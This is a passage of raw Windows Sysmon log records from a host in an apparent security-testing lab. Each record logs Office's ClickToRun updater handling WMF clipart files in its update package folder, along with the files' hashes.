Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0282928.WMFMD5=FF0BB09DC612B8D148D83452205DF8AD,SHA256=96066DC6673FBB09B0E373293BE7AF9519C4EDEDE7C2FF8D0BA32D38862FD9D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0282126.WMFMD5=B258436C04107DC060BBC3AEE78F724C,SHA256=81B0B3A76C0EBEA9F789B5894AB80AD3AE5EFEF5991ED5E4338571371D0972D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0281640.WMFMD5=09947362483F43FF73DF43158C1AF22C,SHA256=BEB4C94D65C8B030B40B36CFB8D58658853EF2B55C169A2DBCF8A843723E86DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0281638.WMFMD5=CA6FA9EFF7F8AC9CEAB7DBBD36B51AF6,SHA256=CC710BA658BC3D71898007F5F61FA1DCA730AD6077DCF7BBD50A2DE30677D07F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0281632.WMFMD5=5DB51B0B930DFBA850AC45AA459127FE,SHA256=76E4C08168E140A0487F22135B3BE0DC3E68AC48886EED16786D5B2D078A305D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0281630.WMFMD5=4EBDD6A8D12AC79EC672DDE5BCFCDBE8,SHA256=4A992A25A4A869EBA1EFDEAFB43A5DE8BE987FC607A54DEA961E7DCB9CF1EDA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0281243.WMFMD5=F4F1A95BA9870FBE0B2B34D9FB933E34,SHA256=A84D63C17F8982CF874AF2FD7BE95416B1E566E778E53DBF687603D202AF8BDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0281008.WMFMD5=AE1E1E0A43E91FD0786FCC169D2829FC,SHA256=728889BCFCD96D2F2BBB6A73B980DFA2229B6D3EA2C366049085D435759E8C2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0280468.WMFMD5=346738E13392AAF5BB59B7ED6A40282C,SHA256=65289A80D3A6B7A037830E2ADA4079D99EF2979873A31DA10B123AC3F337DC0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0279644.WMFMD5=59300A5934CF4B382AAE5D00963FEC00,SHA256=C06C81DE5643C00DB5AB7F7C08D62EF2DA680CEF64317EC948E4AD88F4EF84C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0278702.WMFMD5=48CE8A5A6AD87CD86FD5791DBE1FD8AC,SHA256=0FCAAAAEE6A85C1F6455C800AA02BD350212D51969FFED41C3939FDB575AFBBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0252669.WMFMD5=BE0BDBE3F3A016A17BDA3D596C9B451C,SHA256=0C0C1F4645EDAE04306F1C3A88E8A2B48D509D19D072145782EFB9E3C846F280,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0252629.WMFMD5=4DCF0CB2A908FF4920F0BE67175FBAF3,SHA256=E8E7BC6EA831AFBD7852E12933EA1442816B91FCAC764BB23C5D45A0908B2FA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0251007.WMFMD5=A07E2F4BF81A643342D131078C0EDBA0,SHA256=0E9EE40CE9A58C19A8903B8BEEC3CE83C14719A8C98AD2100F49DE4A7A41397C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0250997.WMFMD5=675EE71AD396C792E7B24931C107A434,SHA256=7729E9DF1AC1EC6BC58D69C6C575917F3814C4E5657B09C10696B7E17931D70B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0250504.WMFMD5=F18F38357B7E0171F78DC162F52A0F1E,SHA256=811D8077E2609B8EBE7FAF2AA2B64A74CC37EF3CA8C44A343FD85538BFE81079,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0241781.WMFMD5=264D3A94FFD2BB37E68D4F737D902730,SHA256=DAFB58088113B6F817C51FF20C759531CD3AB370364D41CC8E5EB857CD707545,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0241773.WMFMD5=081ABAE148A8A97729D20224A8A4C844,SHA256=7A2E5A121BF5C878A1453D26EF435BB87FFF63857171AA911FA3E589F2863E95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0241077.WMFMD5=F2D876ADE382405A6DD67B3F27A6E95F,SHA256=97B238D812454CBA675071A9DAF261573D12A7BA48D1B21B868D73CA648F69DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0241043.WMFMD5=4CF7281985978091FA8B00C24527C9D5,SHA256=708DBD40ED00CAED645522E825D9DC9DC70F42C77D07175A9F284BBB1D824119,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0241041.WMFMD5=F43A6DB3E6129A87FB5337E55331C181,SHA256=E5BCD7A36A76BD42546F85AE563146E4F47D1326B5A0696102E96A68E90C6C73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0241037.WMFMD5=63D2529FA1C8FA4771533D05F7DD4C44,SHA256=CD412DCAD51C25415C5F9643AC98273425D26BE37B2553E802656C5CD6D26D86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0241019.WMFMD5=3B183E188CCE739C1E98272D37DE6AAE,SHA256=025966690BE9D6B81E7CF1A8B9430DB423C3E34EC033B60A7F5F269BDB635557,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0240291.WMFMD5=B4B93D23B1AEFE0E13FF0B357525B33C,SHA256=C1D91E3B416133EAF774A0AFA105D499E768004EE1FD075EFA1FF6145CD3FF9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0240189.WMFMD5=44A70F6B8FC9C11AAD481DE875670E39,SHA256=5790F6B94DE0884D34ECAD68DDB1E31C536D314179166BDD2F7F8D5B894AD348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0240175.WMFMD5=9A176FB6A601CD2B5FD60876F898432D,SHA256=F52F22757A1C37476122392420EB8893F348A6AF107C989D1D925B1D353C7A85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0240157.WMFMD5=6C0A332A5E0C7D42496A52035916BC1A,SHA256=425E90371EA75704BD6EB361E987B236B09AA268A15C24009B8A06C1F17300B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239997.WMFMD5=581B6607BDEEDD5F92117E601669386C,SHA256=7FB98DF86A7A48D32755A31436FDBC70CC1B433C3E19540D3C3335B416FA3CB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239975.WMFMD5=BDE82571CB5B3723B36F8956801696C1,SHA256=0B560AFECE0FC57ADA4D7FC43F171ACBD8B541E64D098E71628230194138EBCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239973.WMFMD5=663B933B176D4F6CBC20006E9F746883,SHA256=BB094460C3ED3F27AAF5B20F7B21F0BFD653D49B084DABDAEF4003D7FAC6A7F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239967.WMFMD5=E17C842A6240C82D94C6426038CB66B0,SHA256=266FC66BBF957A86CE0E660CB42F36CF04A9607CD7AE3430FEB23B625B3AB42E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239965.WMFMD5=49E468EA7ED93FA5D68DD381A202B5A3,SHA256=62FEA1E57A0E9890B730BD562D86B0FA35D5DCE06A77F9B61842EF0392C2F5BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239955.WMFMD5=46FD31F6D5FC5662A0BD882402D1DD5D,SHA256=52B2A8B459A5044C4E7AF36ED0CC531422655AF1C967EFAB5920C2BB8381CC04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239953.WMFMD5=1956734F142B982EF249F7C93DAEDF22,SHA256=D4DE7A9E3BC85BE9CFCC858F4735D1E2568F8AA1339599D12EB2B6DD8EE29390,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239951.WMFMD5=5678CE64B9B98F680447477EFDC90EB0,SHA256=21CC11653DA2336656CF3171E1E20B4745892A85697AD0AD428076DF7F6E9B70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239943.WMFMD5=8EA31991966731D705993F05966ABB05,SHA256=94690992390C278E96E576B26E9A51AD48A5501128A41E93C656C9D9956571A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239941.WMFMD5=76E7871A7A0C885DDE5CD59C6EEF684D,SHA256=BD112FF3BB22FF1E1258F49273C47E76EC3ADDB77C1A0ABE3D86C70657AFF87E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239935.WMFMD5=EE76BEB1CDE857B6430524A128D787EB,SHA256=A9EF3089783F2DA6070F00610254D838C8A5334B873D5F834B48FCA13BC71991,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239611.WMFMD5=E99D5D05C5F2387F342EE882507C777F,SHA256=E2D14F90AA5F680DF8BA0A4566059895BEEA5668A66449A690526B81F24E8F62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239191.WMFMD5=F2439851B8E4E5ABC7639747F0BE628E,SHA256=1F3C1926D3A1196B55579D96995FC54F12BC0A4DEE96BD6D53ACE02C4219B134,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239079.WMFMD5=0A2394D123EB2FB9AE251AD4CAD2BA13,SHA256=13A88B30BFBF039480E84CFE7AE0394D2F71B95B3D4F10F839948978596B8335,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239063.WMFMD5=51F2F1BA01A0D94EF385D13D7E8F24EA,SHA256=E1BC6262D418FDAFEA033B4181C9A63B75A91D0A68F63E178A2EF8FE03BD021F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0239057.WMFMD5=E481F1A9B76C0D87D16594A298065D61,SHA256=5FC60E4F7CA782B69BF10465F2734DC81C12DEF582AA5841D689B72832152F9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0238983.WMFMD5=F40978668C33ABAC78940CC83550A2A6,SHA256=690D255FA17B062CC4C3BEF44E4FA88DEDC52D21746EC18AECDDFAB8E05B6B55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0238959.WMFMD5=534E30430E293DA8240B2E768F2C3C6C,SHA256=D95581AB6A90F30B4EF1807583FE272E2BA4B21AE0A6FF20EA1322DED4D17BFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 